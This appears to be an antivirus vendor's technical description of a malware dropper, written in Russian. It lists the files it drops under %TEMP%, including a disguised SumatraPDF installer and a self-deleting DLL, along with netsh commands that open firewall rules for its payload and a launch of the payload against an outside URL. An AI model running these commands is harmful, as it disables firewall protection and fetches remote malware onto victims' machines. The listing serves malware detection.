Техническая информация
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xfnobrpgmmrkdqa dir=in action=allow program="%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe" enable=yes profile=public,private
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xfnobrpgmmrkdqa dir=out action=allow program="%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe" enable=yes profile=public,private
- %WINDIR%\syswow64\explorer.exe
- %TEMP%\nse8517.tmp\nsexec.dll
- %TEMP%\nse8517.tmp\basiccalculator1.exe
- %TEMP%\nse8517.tmp\sumatrapdf-3.5.2-64-install.exe
- %TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe
- %TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe.config
- %TEMP%\nse8517.tmp\selfdel.dll
- %TEMP%\nse8517.tmp\basiccalculator1.exe
- %TEMP%\nse8517.tmp\nsexec.dll
- %TEMP%\nse8517.tmp\selfdel.dll
- %TEMP%\nse8517.tmp\sumatrapdf-3.5.2-64-install.exe
- %TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe
- %TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe.config
- '%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe' "http://www.textuallyinclud.click" "%TEMP%\nse8517.tmp\7530"
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xfnobrpgmmrkdqa dir=out action=allow program="%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe" enable=yes profile=public,private (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xfnobrpgmmrkdqa dir=in action=allow program="%TEMP%\nse8517.tmp\xfnobrpgmmrkdqa.exe" enable=yes profile=public,private (со скрытым окном)